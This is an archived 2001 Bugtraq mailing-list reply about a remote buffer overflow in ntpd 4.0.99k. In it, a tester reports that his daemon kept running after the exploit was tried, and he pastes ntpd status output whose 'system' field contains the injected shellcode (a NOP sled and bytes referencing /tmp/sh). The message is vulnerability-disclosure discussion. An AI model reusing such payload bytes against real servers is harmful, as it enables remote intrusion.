[20102] in bugtraq
Re: ntpd =< 4.0.99k remote buffer overflow
daemon@ATHENA.MIT.EDU (Stephen Clouse)
Mon Apr 9 06:30:56 2001
Mail-Followup-To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>,
bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain
Content-Disposition: inline; filename="msg.pgp"
Message-ID: <20010407202911.A8759@owns.warpcore.org>
Date: Sat, 7 Apr 2001 20:29:11 -0500
Reply-To: Stephen Clouse <stephenc@THEIQGROUP.COM>
From: Stephen Clouse <stephenc@THEIQGROUP.COM>
X-To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010407092643.Q856@riget.scene.pl>; from
venglin@freebsd.lublin.pl on Sat, Apr 07, 2001 at 09:26:43AM +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Sat, Apr 07, 2001 at 09:26:43AM +0200, Przemyslaw Frasunek wrote:
> As I said, exploiting this overflow isn't so easy -- offset and align
> values vary from platform to platform. Exploit was tested only
> on bare RedHat 7.0 and FreeBSD 4.2-STABLE compiled with -O6 -fomit-frame-pointer
> -march=pentiumpro.
>
> Did your ntpd segfaulted after running an exploit?
Nope, it keeps running normally -- it's still in perfect sync with our main time
server.
I am now noticing that it definitely overflows *something*, though -- someone
pointed out querying the local ntpd's status:
status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,
version="ntpd 4.0.99k Sun Apr 1 04:00:13 CDT 2001 (2)",
processor="i686",
system="M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-k^_^M-^Iv^H1M-@M-^HF^
GM-^IF^LM-0^KM-^IM-sM-^MN^HM-^MV^LM-MM-^@1M-[M-^IM-X@M-MM-^@M-hM-\M-^?M-^?M-^?/
tmp/shM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
- -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PwM-wM-^?M-?w
M-wM-^?M-?M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
- -^PM-^PM-^P,
leap=00, stratum=5, precision=-17, rootdelay=217.951,
rootdispersion=153.179, peer=21044, refid=fs1.theiqgroup.com,
reftime=be7a357a.7fa615a8 Sat, Apr 7 2001 19:55:22.498, poll=9,
clock=be7a364e.b7422467 Sat, Apr 7 2001 19:58:54.715, state=4,
phase=0.224, frequency=-4.567, jitter=0.042, stability=0.004
So the initial assessment is probably wrong. However, I wasted a whole
afternoon searching and cannot for the life of me find the offset where this
data ends up....
- --
Stephen Clouse <stephenc@theiqgroup.com>
Senior Programmer, IQ Coordinator Project Lead
The IQ Group, Inc. <http://www.theiqgroup.com/>
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQA/AwUBOs++5gOGqGs0PadnEQJDCQCfWzZkX6q2RT5fl0OlmR9qL/uQ2+YAn1Cm
46oHzsFjpYgeDq3IME5Y3m1c
=6LdC
-----END PGP SIGNATURE-----
